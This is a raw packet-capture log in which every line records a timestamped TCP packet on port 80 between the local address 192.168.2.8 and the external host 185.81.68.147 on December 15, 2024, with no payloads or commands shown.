                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.348556995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.488588095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.488677979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.488766909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.488816023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.488913059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.488985062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.489584923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.489990950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.490051985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.490114927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.490762949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.490828991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.490854025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.491558075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.491620064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.491684914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.492418051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.492476940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.492527008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.493221998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.493324995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.493350029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.494050980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.494121075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.494162083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.494882107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.494944096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.494987011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.495814085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.495851994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.495892048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.496532917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.496589899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.496633053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.497364044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.497420073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.497466087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.498199940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.498259068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.498287916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.499038935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.499100924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.499140978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.499934912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.499994040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.500051975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.500735044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.500790119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.500818014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.501529932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.501585007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.501645088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.502435923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.502510071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.502540112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.503209114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.503259897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.503321886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.504236937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.504296064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.504334927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.505028009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.505085945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.505100012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.505966902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.506021023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.506098032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.506654978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.506702900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.506711006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.507389069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.507437944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.507483959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.508198023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.508248091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.508308887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.509078979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.509205103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.509212971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.509882927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.509932041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.510000944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.510750055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.510801077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.510823965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.511658907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.511709929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.511753082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.512372971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.512423038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.512490034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.513261080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.513295889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.513319969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.514040947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.514100075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.514161110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.514861107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.514914036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.514976978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.515763998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.515815973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.515889883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.516541958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.516593933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.516649961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.517427921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.517486095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.517519951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.518459082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.518511057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.518570900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.519546986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.519603968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.519673109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.520211935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.520258904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.520266056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.521094084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.521167994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.521235943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.521692038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.521743059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.521774054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.522380114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.522432089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.522512913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.523201942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.523252010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.523298979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.533760071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.533806086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.533871889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.533926010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.533982038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.534037113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.534513950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.534571886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.534638882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.535479069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.535535097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.535631895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.537606001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.537668943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.537771940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.537935019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.537991047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.538054943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.538788080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.538861990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.539077997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.539185047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.539247036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.539953947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.540031910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.540098906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.540921926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.541030884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.541094065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.541728020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.541841030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.541906118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.543409109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.587192059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.680718899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.680900097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.680911064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.680963039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.681010962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.681054115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.681685925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.681763887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.681833982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.682553053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.682631016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.682688951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.683442116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.683634996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.683706999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.684151888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.684273958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.684422016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.685029030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.685113907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.685172081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.685857058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.686029911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.686091900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.686701059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.686794043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.686893940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.687500000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.687603951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.688321114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.688409090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.688514948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.688577890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.689166069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.689296007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.689347029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.690098047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.690136909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.690218925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.690835953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.691037893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.691082001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.691703081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.691773891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.692528009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.692580938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.692619085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.693337917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.693382978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.693448067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.693767071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.694155931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.694293976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.694334030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.695022106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.695111990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.695152044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.695842028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.695965052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.696010113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.696671009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.696774006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.696855068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.697505951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.697606087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.697752953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.698352098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.698443890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.698519945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.699197054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.699306965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.699362040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.700016022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.700124025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.700186968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.700905085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.701047897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.701355934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.701847076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.701947927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.702044964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.702604055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.702672005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.702738047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.703356028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.703423023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.703610897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.704233885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.704293966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.704400063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.705008030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.705120087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.705184937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.705841064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.705955029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.706049919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.706702948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.706820965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.706887007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.707768917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.707941055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.708018064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.708344936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.708444118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.708542109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.709188938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.709296942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.709366083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.710043907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.710172892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.710242987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.710875988 CET8049709185.81.68.147192.168.2.8
